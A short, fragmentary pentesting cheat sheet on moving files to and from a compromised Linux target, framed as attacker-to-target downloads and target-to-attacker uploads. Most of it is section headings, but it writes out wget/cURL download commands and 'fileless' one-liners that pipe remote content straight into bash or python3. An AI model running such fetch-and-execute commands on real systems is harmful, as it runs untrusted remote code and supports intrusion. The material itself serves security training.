Linux Target
Download Operations (Attacker -> Target)
Base64 Encoding and Decoding
Web Downloads with Wget and cURL
wget <URL> -O <PATH_OUTPUT>curl -o <PATH_OUTPUT> <URL>Fileless
curl <URL> | bashwget -qO- <URL> | python3Download with Bash (/dev/tcp)
SSH Downloads
Upload Operations (Target -> Attacker)
Web Upload
Alternative Web File Transfer Method
SCP Upload
Last updated